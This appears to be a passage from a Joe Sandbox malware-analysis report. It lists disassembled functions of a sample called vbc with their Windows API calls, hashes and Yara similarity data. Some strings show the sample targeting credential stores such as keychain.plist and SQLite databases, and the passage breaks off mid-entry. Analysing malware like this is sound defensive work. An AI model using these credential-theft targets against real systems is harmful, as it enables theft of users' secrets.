                                                                                                                                                                        • Instruction ID: e2bdeeadc1d90758f2de231e66b6cadccfeb655152d102dc9dd3295dcddd65f9
                                                                                                                                                                        • Opcode Fuzzy Hash: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 10313371A042069BDB14DFA8AC80BAFB7B89F04310F1100BEE916F72C1DB78DA518769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F843 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040F882
                                                                                                                                                                          • Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
                                                                                                                                                                        • GetMenuStringW.USER32 ref: 0040F90C
                                                                                                                                                                        • GetKeyState.USER32(00000010), ref: 0040F938
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3550944819-0
                                                                                                                                                                        • Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
                                                                                                                                                                        • Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CD44 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$free
                                                                                                                                                                        • String ID: Z6@
                                                                                                                                                                        • API String ID: 2888793982-1638572689
                                                                                                                                                                        • Opcode ID: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
                                                                                                                                                                        • Instruction ID: 1cd3d00781b25d2b94616f77ccd2c248328d95a28ed1044bfffefbc926401994
                                                                                                                                                                        • Opcode Fuzzy Hash: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
                                                                                                                                                                        • Instruction Fuzzy Hash: EB219034500605EFCB60DF29C98185ABBF6FF84314720467EE852E3790E739EE019B44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410174 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                                                                                        • Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
                                                                                                                                                                        • Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
                                                                                                                                                                        • Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
                                                                                                                                                                        • Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040943C Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1865533344-0
                                                                                                                                                                        • Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
                                                                                                                                                                        • Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
                                                                                                                                                                        • Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413D78 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00413DA4
                                                                                                                                                                          • Part of subcall function 004089E1: _snwprintf.MSVCRT ref: 00408A26
                                                                                                                                                                          • Part of subcall function 004089E1: memcpy.MSVCRT ref: 00408A36
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00413DCD
                                                                                                                                                                        • memset.MSVCRT ref: 00413DD7
                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00413DF9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1127616056-0
                                                                                                                                                                        • Opcode ID: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
                                                                                                                                                                        • Instruction ID: e0c1f09ad2cb5d60bcfcc92858fd4079171207d9a16d9363f081e68af551c4db
                                                                                                                                                                        • Opcode Fuzzy Hash: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D1165B2500129BFEF11AF64DC06EDE7B79EF44711F10006AFB05B2151EA359A608F9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004146B4 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 004146C4
                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004146F6
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0041471D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3917621476-0
                                                                                                                                                                        • Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
                                                                                                                                                                        • Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
                                                                                                                                                                        • Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
                                                                                                                                                                        • Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0042F6EF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                        • String ID: sqlite_master
                                                                                                                                                                        • API String ID: 438689982-3163232059
                                                                                                                                                                        • Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
                                                                                                                                                                        • Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
                                                                                                                                                                        • Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E7F0 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040E81D
                                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040E848
                                                                                                                                                                        • wcscat.MSVCRT ref: 0040E85B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 822687973-0
                                                                                                                                                                        • Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
                                                                                                                                                                        • Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
                                                                                                                                                                        • Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
                                                                                                                                                                        • Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416D4F Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,73B75970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                        • malloc.MSVCRT ref: 00416D74
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,73B75970,?,00416E7A,?), ref: 00416D93
                                                                                                                                                                        • free.MSVCRT(00000000,?,73B75970,?,00416E7A,?), ref: 00416D9A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2605342592-0
                                                                                                                                                                        • Opcode ID: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                        • Instruction ID: bcab52b9ccbc4c9bc02d63d2584d5636d902a6cb4a382b6ea3df8204de1a5a00
                                                                                                                                                                        • Opcode Fuzzy Hash: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF089B260E22D7F7B102A75ACC0D7BBB9CDB862FDB21072FF514A1190D9199C015675
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004081EA Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004081F8
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Item
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3888421826-0
                                                                                                                                                                        • Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                        • Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
                                                                                                                                                                        • Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
                                                                                                                                                                        • Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417479 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00417496
                                                                                                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
                                                                                                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004174D0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3727323765-0
                                                                                                                                                                        • Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                        • Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
                                                                                                                                                                        • Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00401C43 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00401C64
                                                                                                                                                                          • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                        • wcslen.MSVCRT ref: 00401C7D
                                                                                                                                                                        • wcslen.MSVCRT ref: 00401C8B
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                                                                                                                                        • String ID: Apple Computer\Preferences\keychain.plist
                                                                                                                                                                        • API String ID: 3183857889-296063946
                                                                                                                                                                        • Opcode ID: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                        • Instruction ID: eecd7d3c3de4f02ea7dbe6204318003872b6068ab845989257e2c34d03a92ed5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
                                                                                                                                                                        • Instruction Fuzzy Hash: 08F0F9B250531866FB20A755DC8AFDA73AC9F01314F2001B7E914E20C3FB7CD944469D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CEF9 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040CF1E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00445ADC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040CF37
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CF49
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CF5A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2754987064-0
                                                                                                                                                                        • Opcode ID: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                        • Instruction ID: 14800c8a4aa59548f5ab429dc5ca7c2185fd5422b2c87da3b8dfa48c6c6ad4f5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
                                                                                                                                                                        • Instruction Fuzzy Hash: 13F01DB780122CBFFB059B94DCC9EEB776CDB09254F0001A6B709E2052DA749E448BB8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CE8A Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040CEAF
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040CECC
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CEDE
                                                                                                                                                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040CEEF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2754987064-0
                                                                                                                                                                        • Opcode ID: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                        • Instruction ID: 5ca945b9895027beb3426ea3ebb999d168a71141a618eb4a8136c4c05ef02c5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
                                                                                                                                                                        • Instruction Fuzzy Hash: 40F062B680152C7FEB81A794DC81EEB776CEB05258F0041B2B749D2041DD349E084F7C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413A55 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
                                                                                                                                                                          • Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
                                                                                                                                                                          • Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00413A7C
                                                                                                                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
                                                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00413A98
                                                                                                                                                                        • GetStockObject.GDI32(00000000), ref: 00413AA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 764393265-0
                                                                                                                                                                        • Opcode ID: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                        • Instruction ID: 110bd5b637e4d79b17592fdcf208372bccb43cad252910099e33a416a39d1a4b
                                                                                                                                                                        • Opcode Fuzzy Hash: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0C839100208BBCF216F60DC05ACE3F21AF05362F104136F914541F2CB759A90DB4C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408D10 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408D2C
                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00408D3C
                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00408D4B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 979780441-0
                                                                                                                                                                        • Opcode ID: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                        • Instruction ID: ec3377692345dfa8f7b5f00acb1c953adbf394747b85e28386a557f9ea6599fc
                                                                                                                                                                        • Opcode Fuzzy Hash: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F05E769005199BEF119BA0DC49BBFB3FCBF1670AF008529E052E1090DB74D0048B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004116B2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1386444988-0
                                                                                                                                                                        • Opcode ID: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                        • Instruction ID: a5b74f8db5ede7a3d830d9ef30c1a68d0a9fd07d2d047c5f1f3455979569a65d
                                                                                                                                                                        • Opcode Fuzzy Hash: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF08231680710BBE751AF68BC06F467A90A786B93F200427F700A51E2D2F98591CB9C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404C2D Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00404C44
                                                                                                                                                                          • Part of subcall function 0041473D: LoadLibraryW.KERNEL32(shlwapi.dll,745D48C0,?,00404C4C,00000000), ref: 00414746
                                                                                                                                                                          • Part of subcall function 0041473D: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
                                                                                                                                                                          • Part of subcall function 0041473D: FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00404C56
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00404C68
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00404C7A
                                                                                                                                                                        Memory Dump Source
